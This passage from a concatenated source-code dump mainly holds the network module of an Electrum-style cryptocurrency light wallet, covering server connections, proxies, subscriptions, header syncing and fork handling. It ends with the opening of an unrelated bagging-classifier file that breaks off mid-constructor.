        return True
    lh = self.get_local_height()
    # More than one block behind counts as lagging.
    result = (lh - sh) > 1
    if result:
        self.print_error('%s is lagging (%d vs %d)' % (self.default_server, sh, lh))
    for k in list(self.blockchains.keys()):
        if not self.blockchains[k].is_valid():
            for server in list(self.interfaces.keys()):
                interface = self.interfaces[server]
                if interface.blockchain and interface.blockchain is self.blockchains[k]:
                    self.close_interface(interface)
            del self.blockchains[k]
    return result
def set_status(self, status):
    """Record the connection status string and fire the 'status' callback."""
    self.connection_status = status
    self.notify('status')
def is_connected(self):
    """True when a main interface is currently attached."""
    return self.interface is not None
def is_connecting(self):
    """True while a connection attempt to the default server is in flight."""
    return self.connection_status == 'connecting'
def is_up_to_date(self):
    """True when every outstanding client request has been answered."""
    return self.unanswered_requests == {}
def queue_request(self, method, params, interface=None):
    """Queue a JSON-RPC request and return its message id.

    All requests must pass through here so message ids stay unique and
    tracked.  Defaults to the current main interface.
    """
    target = self.interface if interface is None else interface
    message_id = self.message_id
    self.message_id += 1
    if self.debug:
        self.print_error(target.host, "-->", method, params, message_id)
    target.queue_request(method, params, message_id)
    return message_id
def send_subscriptions(self):
    """Replay all subscriptions and unanswered requests to a new interface.

    Called after switching main interface so the fresh server ends up with
    the same subscription state as the old one.
    """
    self.print_error('sending subscriptions to', self.interface.server, len(self.unanswered_requests),
                     len(self.subscribed_addresses), len(self.subscribed_tokens))
    # Cached answers came from the old server; discard them.
    self.sub_cache.clear()
    # Resend unanswered requests
    requests = self.unanswered_requests.values()
    self.unanswered_requests = {}
    for request in requests:
        message_id = self.queue_request(request[0], request[1])
        self.unanswered_requests[message_id] = request
    self.queue_request('server.banner', [])
    # self.queue_request('server.donation_address', [])
    #self.queue_request('server.peers.subscribe', [])
    for i in bitcoin.FEE_TARGETS:
        self.queue_request('blockchain.estimatefee', [i])
    self.queue_request('blockchain.relayfee', [])
    for h in list(self.subscribed_addresses):
        self.queue_request('blockchain.scripthash.subscribe', [h])
    for hash160, contract_addr, topic in list(self.subscribed_tokens):
        self.queue_request('blockchain.contract.event.subscribe', [hash160, contract_addr, topic])
def get_status_value(self, key):
    """Return the current value behind a notification *key*.

    NOTE(review): an unknown key falls through every branch and raises
    UnboundLocalError on the return -- callers only pass the names below.
    """
    if key == 'status':
        value = self.connection_status
    elif key == 'banner':
        value = self.banner
    elif key == 'fee':
        value = self.config.fee_estimates
    elif key == 'updated':
        value = (self.get_local_height(), self.get_server_height())
    elif key == 'servers':
        value = self.get_servers()
    elif key == 'interfaces':
        value = self.get_interfaces()
    return value
def notify(self, key):
    """Fire the callbacks for *key*; 'status'/'updated' carry no payload."""
    if key in ('status', 'updated'):
        self.trigger_callback(key)
    else:
        self.trigger_callback(key, self.get_status_value(key))
def get_parameters(self):
    """Return (host, port, protocol, proxy, auto_connect) for the UI."""
    host, port, protocol = deserialize_server(self.default_server)
    return host, port, protocol, self.proxy, self.auto_connect
def get_donation_address(self):
    """Return the server's donation address, or None while disconnected."""
    if self.is_connected():
        return self.donation_address
def get_interfaces(self):
    """Return the server names of interfaces in connected state."""
    return list(self.interfaces)
def get_servers(self):
    """Return the union of default, IRC-discovered and recent servers.

    Bug fix: the original aliased ``constants.net.DEFAULT_SERVERS`` and
    then mutated it (``out.update``/``out[host] = ...``), permanently
    polluting the module-wide default table.  Work on a copy instead.
    """
    out = dict(constants.net.DEFAULT_SERVERS)
    if self.irc_servers:
        out.update(filter_version(self.irc_servers.copy()))
    else:
        for s in self.recent_servers:
            try:
                host, port, protocol = deserialize_server(s)
            except (ValueError, AssertionError):
                # Malformed history entry: skip it.
                continue
            if host not in out:
                out[host] = {protocol: port}
    return out
def start_interface(self, server):
    """Begin connecting to *server* unless already connected or connecting."""
    if (not server in self.interfaces and not server in self.connecting):
        if server == self.default_server:
            self.print_error("connecting to %s as new interface" % server)
            self.set_status('connecting')
        self.connecting.add(server)
        # Connection() reports back through self.socket_queue when done.
        c = Connection(server, self.socket_queue, self.config.path)
def start_random_interface(self):
    """Open one more connection to a server we aren't already using."""
    exclude = self.disconnected_servers | set(self.interfaces)
    server = pick_random_server(self.get_servers(), self.protocol, exclude)
    if server:
        self.start_interface(server)
def start_interfaces(self):
    """Connect the default server plus enough random peers to fill the pool."""
    self.start_interface(self.default_server)
    for _ in range(self.num_server - 1):
        self.start_random_interface()
def set_proxy(self, proxy):
    """Install (or remove) a SOCKS/HTTP proxy by monkey-patching socket.

    *proxy* is a dict as produced by deserialize_proxy(), or None to
    restore direct connections.
    """
    self.proxy = proxy
    # Store these somewhere so we can un-monkey-patch
    if not hasattr(socket, "_socketobject"):
        socket._socketobject = socket.socket
        socket._getaddrinfo = socket.getaddrinfo
    if proxy:
        self.print_error('setting proxy', proxy)
        # proxy_modes index + 1 lines up with the socks module's
        # PROXY_TYPE_* constants.
        proxy_mode = proxy_modes.index(proxy["mode"]) + 1
        socks.setdefaultproxy(proxy_mode,
                              proxy["host"],
                              int(proxy["port"]),
                              # socks.py seems to want either None or a non-empty string
                              username=(proxy.get("user", "") or None),
                              password=(proxy.get("password", "") or None))
        socket.socket = socks.socksocket
        # prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy
        socket.getaddrinfo = lambda *args: [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]
    else:
        socket.socket = socket._socketobject
        socket.getaddrinfo = socket._getaddrinfo
def start_network(self, protocol, proxy):
    """Bring the network up: install the proxy, then open all interfaces."""
    assert not self.interface and not self.interfaces
    assert not self.connecting and self.socket_queue.empty()
    self.print_error('starting network')
    self.disconnected_servers = set()
    self.protocol = protocol
    self.set_proxy(proxy)
    self.start_interfaces()
def stop_network(self):
    """Close every interface and reset pending-connection state."""
    self.print_error("stopping network")
    for interface in list(self.interfaces.values()):
        self.close_interface(interface)
    if self.interface:
        self.close_interface(self.interface)
    assert self.interface is None
    assert not self.interfaces
    self.connecting = set()
    # Get a new queue - no old pending connections thanks!
    self.socket_queue = queue.Queue()
def set_parameters(self, host, port, protocol, proxy, auto_connect):
    """Apply new user-chosen connection settings.

    Restarts the whole network when the proxy or protocol changed, just
    switches interface when only the server changed, and otherwise checks
    for lag.
    """
    proxy_str = serialize_proxy(proxy)
    server = serialize_server(host, port, protocol)
    # sanitize parameters
    try:
        deserialize_server(serialize_server(host, port, protocol))
        if proxy:
            proxy_modes.index(proxy["mode"]) + 1
            int(proxy['port'])
    except:
        return
    self.config.set_key('auto_connect', auto_connect, False)
    self.config.set_key("proxy", proxy_str, False)
    self.config.set_key("server", server, True)
    # abort if changes were not allowed by config
    if self.config.get('server') != server or self.config.get('proxy') != proxy_str:
        return
    self.auto_connect = auto_connect
    if self.proxy != proxy or self.protocol != protocol:
        # Restart the network defaulting to the given server
        self.stop_network()
        self.default_server = server
        self.start_network(protocol, proxy)
    elif self.default_server != server:
        self.switch_to_interface(server)
    else:
        self.switch_lagging_interface()
        self.notify('updated')
def switch_to_random_interface(self):
    """Hop to a random connected server other than the current one."""
    candidates = self.get_interfaces()  # Those in connected state
    if self.default_server in candidates:
        candidates.remove(self.default_server)
    if candidates:
        self.switch_to_interface(random.choice(candidates))
def switch_lagging_interface(self):
    """When auto-connect is on and we lag, hop to a server on our header.

    Candidates are interfaces whose tip header equals our local chain tip
    (matching on header content, not just height).
    """
    if self.server_is_lagging() and self.auto_connect:
        header = self.blockchain().read_header(self.get_local_height())
        candidates = [server for server, iface in self.interfaces.items()
                      if iface.tip_header == header]
        if candidates:
            self.switch_to_interface(random.choice(candidates))
def switch_to_interface(self, server):
    '''Switch to server as our interface. If no connection exists nor
    being opened, start a thread to connect. The actual switch will
    happen on receipt of the connection notification. Do nothing
    if server already is our interface.'''
    self.default_server = server
    if server not in self.interfaces:
        # Not connected yet: clear the main interface and start a
        # connection attempt; new_interface() will call us back.
        self.interface = None
        self.start_interface(server)
        return
    i = self.interfaces[server]
    if self.interface != i:
        self.print_error("switching to", server)
        # stop any current interface in order to terminate subscriptions
        # fixme: we don't want to close headers sub
        #self.close_interface(self.interface)
        self.interface = i
        self.send_subscriptions()
        self.set_status('connected')
        self.notify('updated')
def close_interface(self, interface):
    """Close *interface* and drop it from our bookkeeping (None is a no-op)."""
    if not interface:
        return
    self.interfaces.pop(interface.server, None)
    if interface.server == self.default_server:
        self.interface = None
    interface.close()
def add_recent_server(self, server):
    """Move *server* to the front of the bounded most-recently-used list."""
    if server in self.recent_servers:
        self.recent_servers.remove(server)
    self.recent_servers.insert(0, server)
    # Keep only the 20 most recent entries.
    self.recent_servers = self.recent_servers[:20]
    self.save_recent_servers()
def process_response(self, interface, response, callbacks):
    """Dispatch one server response: handle known methods, then run callbacks."""
    if self.debug:
        self.print_error("<--", response)
    error = response.get('error')
    result = response.get('result')
    method = response.get('method')
    params = response.get('params')
    # We handle some responses; return the rest to the client.
    if method == 'server.version':
        interface.server_version = result
    elif method == 'blockchain.headers.subscribe':
        if error is None:
            self.on_notify_header(interface, result)
    elif method == 'server.peers.subscribe':
        if error is None:
            self.irc_servers = parse_servers(result)
            self.notify('servers')
    elif method == 'server.banner':
        if error is None:
            self.banner = result
            self.notify('banner')
    elif method == 'server.donation_address':
        if error is None:
            self.donation_address = result
    elif method == 'blockchain.estimatefee':
        if error is None and result is not None and result > 0:
            # Server reports a fee rate; convert to integer base units.
            i = params[0]
            fee = int(result*COIN)
            self.config.fee_estimates[i] = fee
            self.print_error("fee_estimates[%d]" % i, fee)
            self.notify('fee')
    elif method == 'blockchain.relayfee':
        if error is None and result is not None and result > 0:
            self.relay_fee = int(result * COIN)
            self.print_error("relayfee", self.relay_fee)
    elif method == 'blockchain.block.headers':
        self.on_block_headers(interface, response)
    elif method == 'blockchain.block.get_header':
        self.on_get_header(interface, response)
    for callback in callbacks:
        callback(response)
def get_index(self, method, params):
    """Build the hashable key used by the subscription and cache tables."""
    if method == 'blockchain.contract.event.subscribe':
        # Token subscriptions are keyed by all three event parameters.
        return '{}:{}:{}:{}'.format(method, params[0], params[1], params[2])
    if params:
        return '{}:{}'.format(method, params[0])
    return str(method)
def process_responses(self, interface):
    """Drain an interface's responses, canonicalize them, run callbacks.

    Two cases per item: a reply paired with the request we sent, or an
    unsolicited notification (request is None) that must be reshaped to
    look like a subscription reply.
    """
    responses = interface.get_responses()
    for request, response in responses:
        if request:
            method, params, message_id = request
            k = self.get_index(method, params)
            # client requests go through self.send() with a
            # callback, are only sent to the current interface,
            # and are placed in the unanswered_requests dictionary
            client_req = self.unanswered_requests.pop(message_id, None)
            if client_req:
                assert interface == self.interface
                callbacks = [client_req[2]]
            else:
                # fixme: will only work for subscriptions
                k = self.get_index(method, params)
                callbacks = self.subscriptions.get(k, [])
            # Copy the request method and params to the response
            response['method'] = method
            response['params'] = params
            # Only once we've received a response to an addr subscription
            # add it to the list; avoids double-sends on reconnection
            if method == 'blockchain.scripthash.subscribe':
                self.subscribed_addresses.add(params[0])
            elif method == 'blockchain.contract.event.subscribe':
                self.subscribed_tokens.add((params[0], params[1], params[2]))
        else:
            if not response:  # Closed remotely / misbehaving
                self.connection_down(interface.server)
                break
            # Rewrite response shape to match subscription request response
            method = response.get('method')
            params = response.get('params')
            k = self.get_index(method, params)
            if method == 'blockchain.headers.subscribe':
                response['result'] = params[0]
                response['params'] = []
            elif method == 'blockchain.scripthash.subscribe':
                response['params'] = [params[0]]  # addr
                response['result'] = params[1]
            elif method == 'blockchain.contract.event.subscribe':
                response['params'] = params[0:3]  # addr, contract, topic
                response['result'] = params[3]
            callbacks = self.subscriptions.get(k, [])
        # update cache if it's a subscription
        if method.endswith('.subscribe'):
            self.sub_cache[k] = response
        # Response is now in canonical form
        self.process_response(interface, response, callbacks)
def map_scripthash_to_address(self, callback):
    """Wrap *callback* so scripthash params are translated back to addresses."""
    def translate(response):
        translated = response.copy()
        scripthash_params = translated.pop('params')
        translated['params'] = [self.h2addr[scripthash_params[0]]]
        callback(translated)
    return translate
def subscribe_to_addresses(self, addresses, callback):
    """Subscribe to status changes for *addresses*, keyed by scripthash."""
    hash2address = {bitcoin.address_to_scripthash(addr): addr for addr in addresses}
    self.h2addr.update(hash2address)
    messages = [('blockchain.scripthash.subscribe', [h]) for h in hash2address]
    self.send(messages, self.map_scripthash_to_address(callback))
def request_address_history(self, address, callback):
    """Fetch the full history of *address* via its scripthash."""
    scripthash = bitcoin.address_to_scripthash(address)
    self.h2addr[scripthash] = address
    self.send([('blockchain.scripthash.get_history', [scripthash])],
              self.map_scripthash_to_address(callback))
def subscribe_tokens(self, tokens, callback):
    """Subscribe to transfer events for each token's bind address."""
    messages = []
    for token in tokens:
        owner_hash160 = bh2u(b58_address_to_hash160(token.bind_addr)[1])
        messages.append(('blockchain.contract.event.subscribe',
                         [owner_hash160, token.contract_addr, TOKEN_TRANSFER_TOPIC]))
    self.send(messages, callback)
def request_token_balance(self, token, callback):
    """Query the token contract for the bind address's balance.

    :type token: Token
    :param callback: invoked with the contract-call response
    """
    _, raw_hash160 = b58_address_to_hash160(token.bind_addr)
    hash160 = bh2u(raw_hash160)
    # 70a08231 is the balanceOf(address) selector; the address argument is
    # left-padded to 32 bytes.
    datahex = '70a08231{}'.format(hash160.zfill(64))
    self.send([('blockchain.contract.call',
                [token.contract_addr, datahex, '', 'int'])], callback)
def request_token_history(self, token, callback):
    """Fetch past transfer events for the token's bind address."""
    _, raw_hash160 = b58_address_to_hash160(token.bind_addr)
    hash160 = bh2u(raw_hash160)
    self.send([('blockchain.contract.event.get_history',
                [hash160, token.contract_addr, TOKEN_TRANSFER_TOPIC])], callback)
def send(self, messages, callback):
    '''Messages is a list of (method, params) tuples'''
    batch = list(messages)
    with self.lock:
        self.pending_sends.append((batch, callback))
def process_pending_sends(self):
    """Flush queued client sends, answering subscriptions from cache."""
    # Requests needs connectivity. If we don't have an interface,
    # we cannot process them.
    if not self.interface:
        return
    with self.lock:
        sends = self.pending_sends
        self.pending_sends = []
    for messages, callback in sends:
        for method, params in messages:
            r = None
            if method.endswith('.subscribe'):
                k = self.get_index(method, params)
                # add callback to list
                l = self.subscriptions.get(k, [])
                if callback not in l:
                    l.append(callback)
                self.subscriptions[k] = l
                # check cached response for subscriptions
                r = self.sub_cache.get(k)
            if r is not None and not method.endswith('contract.subscribe'):
                # Answer from cache; no round-trip needed.
                self.print_error("cache hit", k)
                callback(r)
            else:
                message_id = self.queue_request(method, params)
                self.unanswered_requests[message_id] = method, params, callback
def unsubscribe(self, callback):
    """Drop *callback* from all subscriptions so it can be garbage-collected.

    The server side cannot be unsubscribed, so later notifications for it
    are reported as unexpected -- a harmless warning.
    """
    with self.lock:
        for subscribers in self.subscriptions.values():
            if callback in subscribers:
                subscribers.remove(callback)
def connection_down(self, server):
    '''A connection to server either went down, or was never made.
    We distinguish by whether it is in self.interfaces.'''
    self.disconnected_servers.add(server)
    if server == self.default_server:
        self.set_status('disconnected')
    if server in self.interfaces:
        self.close_interface(self.interfaces[server])
        self.notify('interfaces')
    # Any chain that was catching up via this server needs a new source.
    for chain in self.blockchains.values():
        if chain.catch_up == server:
            chain.catch_up = None
def new_interface(self, server, socket):
    """Adopt a freshly-connected socket as an Interface and prime it."""
    # todo: get tip first, then decide which checkpoint to use.
    self.add_recent_server(server)
    interface = Interface(server, socket)
    interface.blockchain = None
    interface.tip_header = None
    interface.tip = 0
    interface.mode = 'default'
    interface.request = None
    self.interfaces[server] = interface
    # Handshake: announce our version and subscribe to header notifications.
    self.queue_request('server.version', [ELECTRUM_VERSION, PROTOCOL_VERSION], interface)
    self.queue_request('blockchain.headers.subscribe', [True], interface)
    if server == self.default_server:
        self.switch_to_interface(server)
    #self.notify('interfaces')
def maintain_sockets(self):
    '''Socket maintenance.'''
    # Responses to connection attempts?
    while not self.socket_queue.empty():
        server, socket = self.socket_queue.get()
        if server in self.connecting:
            self.connecting.remove(server)
        if socket:
            self.new_interface(server, socket)
        else:
            self.connection_down(server)
    # Send pings and shut down stale interfaces
    # must use copy of values
    for interface in list(self.interfaces.values()):
        if interface.has_timed_out():
            self.connection_down(interface.server)
        elif interface.ping_required():
            self.queue_request('server.ping', [], interface)
    now = time.time()
    # nodes
    if len(self.interfaces) + len(self.connecting) < self.num_server:
        self.start_random_interface()
    if now - self.nodes_retry_time > NODES_RETRY_INTERVAL:
        # Periodically forgive servers that failed earlier.
        self.print_error('network: retrying connections')
        self.disconnected_servers = set([])
        self.nodes_retry_time = now
    # main interface
    if not self.is_connected():
        if self.auto_connect:
            if not self.is_connecting():
                self.switch_to_random_interface()
        else:
            if self.default_server in self.disconnected_servers:
                if now - self.server_retry_time > SERVER_RETRY_INTERVAL:
                    self.disconnected_servers.remove(self.default_server)
                    self.server_retry_time = now
            else:
                self.switch_to_interface(self.default_server)
def request_chunk(self, interface, index):
    """Ask *interface* for the 2016-header chunk at *index*, at most once."""
    if index in self.requested_chunks:
        return
    interface.print_error("requesting chunk %d" % index)
    start_height = index * 2016
    self.queue_request('blockchain.block.headers', [start_height, 2016],
                       interface)
    self.requested_chunks.add(index)
def on_block_headers(self, interface, response):
    '''Handle receiving a chunk of block headers'''
    error = response.get('error')
    result = response.get('result')
    params = response.get('params')
    blockchain = interface.blockchain
    if result is None or params is None or error is not None:
        print_error('on get chunk error', error, result, params)
        return
    # Chunks are aligned to 2016-header boundaries; anything else (or a
    # chunk we never asked for) is discarded.
    height = params[0]
    index = height // 2016
    if index * 2016 != height or index not in self.requested_chunks:
        interface.print_error("received chunk %d (unsolicited)" % index)
        return
    else:
        interface.print_error("received chunk %d" % index)
    self.requested_chunks.remove(index)
    hexdata = result['hex']
    connect = blockchain.connect_chunk(index, hexdata)
    if not connect:
        # Chunk did not link to our chain: drop this server.
        self.connection_down(interface.server)
        return
    # If not finished, get the next chunk
    if blockchain.height() < interface.tip:
        self.request_chunk(interface, index+1)
    else:
        interface.mode = 'default'
        interface.print_error('catch up done', blockchain.height())
        blockchain.catch_up = None
        self.notify('updated')
def request_header(self, interface, height):
    """Ask *interface* for one header, clamping negative heights to zero."""
    height = max(height, 0)
    self.queue_request('blockchain.block.get_header', [height], interface)
    # Remember what we asked for so unsolicited replies can be detected.
    interface.request = height
    interface.req_time = time.time()
def on_get_header(self, interface, response):
    '''Handle receiving a single block header.

    Drives the per-interface chain-location state machine:

    - 'backward': walking back from the server's tip to find a header we
      can connect to one of our chains.
    - 'binary': binary-searching between a known-good and known-bad height
      to pin down the exact fork point.
    - 'catch_up': downloading headers forward until we reach the tip.

    At the end, either the next header/chunk is requested or the interface
    returns to 'default' mode.
    '''
    header = response.get('result')
    if not header:
        interface.print_error(response)
        self.connection_down(interface.server)
        return
    height = header.get('block_height')
    # print_error('[on_get_header] {} {}'.format(height, interface.mode))
    if interface.request != height:
        # Response does not match the height we asked for: misbehaving server.
        interface.print_error("unsolicited header", interface.request, height)
        self.connection_down(interface.server)
        return
    # `blockchain` here is the module; check_header looks for a chain that
    # already contains this header.
    chain = blockchain.check_header(header)
    if interface.mode == 'backward':
        can_connect = blockchain.can_connect(header)
        if can_connect and can_connect.catch_up is None:
            # Found a chain this header extends, and no one else is
            # catching that chain up: claim it and move forward.
            interface.mode = 'catch_up'
            interface.blockchain = can_connect
            interface.blockchain.save_header(header)
            next_height = height + 1
            interface.blockchain.catch_up = interface.server
        elif chain:
            # Header already known: the fork point lies between this
            # (good) height and the previously seen bad height.
            interface.print_error("binary search")
            interface.mode = 'binary'
            interface.blockchain = chain
            interface.good = height
            next_height = (interface.bad + interface.good) // 2
        else:
            if height == 0:
                # Genesis mismatch: server is on a different network.
                self.connection_down(interface.server)
                next_height = None
            else:
                # Keep walking backward, doubling the step each time.
                interface.bad = height
                interface.bad_header = header
                delta = interface.tip - height
                next_height = max(0, interface.tip - 2 * delta)
    elif interface.mode == 'binary':
        if chain:
            interface.good = height
            interface.blockchain = chain
        else:
            interface.bad = height
            interface.bad_header = header
        if interface.bad != interface.good + 1:
            # Interval not yet closed: continue bisecting.
            next_height = (interface.bad + interface.good) // 2
        elif not interface.blockchain.can_connect(interface.bad_header, check_height=False):
            # Fork point found but the first bad header doesn't even link
            # to our chain: server is useless.
            self.connection_down(interface.server)
            next_height = None
        else:
            # Fork point identified at interface.bad.
            branch = self.blockchains.get(interface.bad)
            if branch is not None:
                # A fork at this height is already tracked.
                if branch.check_header(interface.bad_header):
                    interface.print_error('joining chain', interface.bad)
                    next_height = None
                elif branch.parent().check_header(header):
                    interface.print_error('reorg', interface.bad, interface.tip)
                    interface.blockchain = branch.parent()
                    next_height = None
                else:
                    # Existing fork conflicts: truncate and restart it
                    # from the server's version.
                    interface.print_error('checkpoint conflicts with existing fork', branch.path())
                    branch.write(b'', 0)
                    branch.save_header(interface.bad_header)
                    interface.mode = 'catch_up'
                    interface.blockchain = branch
                    next_height = interface.bad + 1
                    interface.blockchain.catch_up = interface.server
            else:
                # No tracked fork at this height yet.
                bh = interface.blockchain.height()
                next_height = None
                if bh > interface.good:
                    if not interface.blockchain.check_header(interface.bad_header):
                        # Our chain diverges: create a new fork object.
                        b = interface.blockchain.fork(interface.bad_header)
                        self.blockchains[interface.bad] = b
                        interface.blockchain = b
                        interface.print_error("new chain", b.checkpoint)
                        interface.mode = 'catch_up'
                        next_height = interface.bad + 1
                        interface.blockchain.catch_up = interface.server
                else:
                    assert bh == interface.good
                    if interface.blockchain.catch_up is None and bh < interface.tip:
                        interface.print_error("catching up from %d"% (bh + 1))
                        interface.mode = 'catch_up'
                        next_height = bh + 1
                        interface.blockchain.catch_up = interface.server
                self.notify('updated')
    elif interface.mode == 'catch_up':
        can_connect = interface.blockchain.can_connect(header)
        if can_connect:
            interface.blockchain.save_header(header)
            next_height = height + 1 if height < interface.tip else None
        else:
            # go back
            interface.print_error("cannot connect", height)
            interface.mode = 'backward'
            interface.bad = height
            interface.bad_header = header
            next_height = height - 1
        if next_height is None:
            # exit catch_up state
            interface.print_error('catch up done', interface.blockchain.height())
            interface.blockchain.catch_up = None
            self.switch_lagging_interface()
            self.notify('updated')
    else:
        raise Exception(interface.mode)
    # If not finished, get the next header
    if next_height:
        # Far from the tip: fetch whole 2016-header chunks instead of
        # single headers.  CHUNK_SIZE is presumably 2016 — TODO confirm
        # against its definition elsewhere in this module.
        if interface.mode == 'catch_up' and interface.tip > next_height + 50:
            self.request_chunk(interface, next_height // CHUNK_SIZE)
        else:
            self.request_header(interface, next_height)
    else:
        interface.mode = 'default'
        interface.request = None
        self.notify('updated')
    # refresh network dialog
    self.notify('interfaces')
def maintain_requests(self):
    """Drop connections whose outstanding header request has timed out.

    ``request_header`` stamps ``interface.req_time`` when it queues a
    header request; any interface still waiting on one after 20 seconds
    is considered stalled and its connection is torn down.
    """
    for interface in list(self.interfaces.values()):
        # Bug fix: the timestamp attribute set by request_header is
        # 'req_time'; 'request_time' does not exist and raised
        # AttributeError here whenever a request was pending.
        if interface.request and time.time() - interface.req_time > 20:
            interface.print_error("blockchain request timed out")
            self.connection_down(interface.server)
            continue
def wait_on_sockets(self):
    '''Poll all interface sockets once (0.1 s timeout) and dispatch I/O.

    Writable interfaces with queued requests get them sent; readable
    interfaces have their responses processed.
    '''
    # Python docs say Windows doesn't like empty selects.
    # Sleep to prevent busy looping
    if not self.interfaces:
        time.sleep(0.1)
        return
    # Watch every interface for readability; only those with pending
    # requests for writability.
    rin = [i for i in self.interfaces.values()]
    win = [i for i in self.interfaces.values() if i.num_requests()]
    try:
        rout, wout, xout = select.select(rin, win, [], 0.1)
    except (socket.error, OSError) as e:
        # A dead socket in the sets; skip this round and let the
        # maintenance logic clean it up.
        print_error('[wait_on_sockets]', e)
        return
        # TODO: py3, get code from e
        # code = None
        # if code == errno.EINTR:
        #     return
        # raise
    assert not xout
    for interface in wout:
        interface.send_requests()
    for interface in rout:
        self.process_responses(interface)
def init_headers_file(self):
    '''Placeholder: bulk header-file bootstrap is currently disabled.

    The commented-out implementation below downloaded a pre-built headers
    file in a background thread; it is kept for reference.
    '''
    pass
    # b = self.blockchains[0]
    # if b.get_hash(0) == bitcoin.GENESIS:
    #     self.downloading_headers = False
    #     return
    # filename = b.path()
    # def download_thread():
    #     try:
    #         import urllib.request, socket
    #         socket.setdefaulttimeout(30)
    #         self.print_error("downloading ", bitcoin.HEADERS_URL)
    #         urllib.request.urlretrieve(bitcoin.HEADERS_URL, filename + '.tmp')
    #         os.rename(filename + '.tmp', filename)
    #         self.print_error("done.")
    #     except Exception:
    #         self.print_error("download failed. creating file", filename)
    #         # open(filename, 'wb+').close()
    #     b = self.blockchains[0]
    #     with b.lock: b.update_size()
    #     self.downloading_headers = False
    # self.downloading_headers = True
    # t = threading.Thread(target = download_thread)
    # t.daemon = True
    # t.start()
def run(self):
    '''Main network-thread loop.

    Repeats socket maintenance, select-based I/O, request timeout checks,
    registered jobs, and pending sends until the network is asked to stop,
    then shuts down cleanly.
    '''
    # self.init_headers_file()
    #
    # while self.is_running() and self.downloading_headers:
    #     time.sleep(1)
    while self.is_running():
        self.maintain_sockets()
        self.wait_on_sockets()
        self.maintain_requests()
        self.run_jobs()  # Synchronizer and Verifier
        self.process_pending_sends()
    self.stop_network()
    self.on_stop()
def on_notify_header(self, interface, header_dict):
    """Handle a new tip header pushed by *interface*.

    Updates the interface's tip, and — when the interface is idle
    ('default' mode) — tries to attach the header to a known chain,
    falling back to a backward search or an initial catch-up when it
    does not fit anywhere.
    """
    header_hex, height = header_dict['hex'], header_dict['height']
    header = blockchain.deserialize_header(bfh(header_hex), height)
    height = header.get('block_height')
    if not height:
        return
    interface.tip_header = header
    interface.tip = height
    if interface.mode != 'default':
        # A chain-location state machine is already driving this
        # interface; don't interfere.
        return
    b = blockchain.check_header(header)
    if b:
        # Header already on a known chain: just attach the interface.
        interface.blockchain = b
        self.switch_lagging_interface()
        self.notify('interfaces')
        return
    b = blockchain.can_connect(header)
    if b:
        # Header extends a known chain: save it.
        interface.blockchain = b
        b.save_header(header)
        self.switch_lagging_interface()
        # Bug fix: 'updated' was notified twice in a row here; once is
        # sufficient for listeners.
        self.notify('updated')
        self.notify('interfaces')
        return
    tip = max([x.height() for x in self.blockchains.values()])
    if tip >= 0:
        # We have some local headers: search backward for a common block.
        interface.mode = 'backward'
        interface.bad = height
        interface.bad_header = header
        self.request_header(interface, min(tip, height - 1))
    else:
        # Empty local chain: start catching up from genesis.
        chain = self.blockchains[0]
        if chain.catch_up is None:
            # NOTE(review): elsewhere catch_up is set to a server string,
            # here to the interface object — confirm which consumers rely
            # on which before changing it.
            chain.catch_up = interface
            interface.mode = 'catch_up'
            interface.blockchain = chain
        self.request_header(interface, 0)
def blockchain(self):
    """Return the currently-followed Blockchain object.

    If the active interface is attached to a chain, adopt that chain's
    checkpoint as the current blockchain index first.
    """
    active = self.interface
    if active and active.blockchain is not None:
        self.blockchain_index = active.blockchain.checkpoint
    return self.blockchains[self.blockchain_index]
def get_blockchains(self):
    """Map checkpoint -> list of interfaces following that chain.

    Chains with no attached interface are omitted from the result.
    """
    result = {}
    all_interfaces = list(self.interfaces.values())
    for checkpoint, chain in self.blockchains.items():
        followers = [i for i in all_interfaces if i.blockchain == chain]
        if followers:
            result[checkpoint] = followers
    return result
def follow_chain(self, index):
    '''Switch the network to follow the chain identified by *index*.

    Persists the choice in the config, switches to an interface already on
    that chain if one exists, and re-applies connection parameters so the
    default server matches the new interface.

    :raises Exception: if no chain with that index is tracked.
    '''
    blockchain = self.blockchains.get(index)
    if blockchain:
        self.blockchain_index = index
        self.config.set_key('blockchain_index', index)
        # Prefer an interface that is already on the requested chain.
        for i in self.interfaces.values():
            if i.blockchain == blockchain:
                self.switch_to_interface(i.server)
                break
    else:
        raise Exception('blockchain not found', index)
    if self.interface:
        # Re-derive host/port/protocol from the (possibly new) interface
        # server string; presumably 'host:port:protocol' — TODO confirm.
        server = self.interface.server
        host, port, protocol, proxy, auto_connect = self.get_parameters()
        host, port, protocol = server.split(':')
        self.set_parameters(host, port, protocol, proxy, auto_connect)
def get_local_height(self):
    """Return the height of the currently-followed chain, refreshing its
    size from disk first."""
    chain = self.blockchain()
    chain.update_size()
    return chain.height()
def synchronous_get(self, request, timeout=30):
    """Send *request* and block until its response arrives.

    :param request: a single (method, params) request tuple.
    :param timeout: seconds to wait before giving up.
    :return: the response's 'result' field.
    :raises Exception: on timeout or when the server returns an error.
    """
    responses = queue.Queue()
    self.send([request], responses.put)
    try:
        reply = responses.get(True, timeout)
    except queue.Empty:
        raise Exception('Server did not answer')
    error = reply.get('error')
    if error:
        raise Exception(error)
    return reply.get('result')
def broadcast(self, tx, timeout=30):
    """Broadcast transaction *tx* to the network.

    :return: (True, txid) on success; (False, error message) otherwise.
    """
    expected_hash = tx.txid()
    try:
        result = self.synchronous_get(
            ('blockchain.transaction.broadcast', [str(tx)]), timeout)
    except BaseException as e:
        return False, "error: " + str(e)
    # The server echoes the txid on success; anything else is an error text.
    if result != expected_hash:
        return False, "error: " + result
    return True, result
|
ensemble.py | __author__ = 'Prateek'
import time
import math
import numpy as np
import copy
from decisiontree import DecisiontreeClassifier
from multiprocessing import Process, Queue
class BaggingClassifier():
    '''
    Bagging classifier is meta-algorithm that builds a number of estimators on bootstrapped(with replacement)
    versions of the training dataset. Bagging is used on estimators which have high variance like a decision
    tree that has memorized the data i.e. there is a tree path for each data point. The prediction is done
    using various combination functions like weighted mean, average, max, min etc.
    '''

    def __init__(self, baseEstimator=None, n_estimators=10, bootstrap=True, random_state=None, max_depth=None):
        '''
        :param baseEstimator: the estimator to be used(default: Decision Tree)
        :param n_estimators: number of estimators to be used
        :param bootstrap: create bootstrap sample of data set(default True)
        :param random_state: random seed
        :param max_depth: max depth of the decision tree (default is None)
        '''
        self.baseEstimator = baseEstimator
        self.n_estimators = n_estimators
        # NOTE(review): `bootstrap` is stored but fit() always samples with
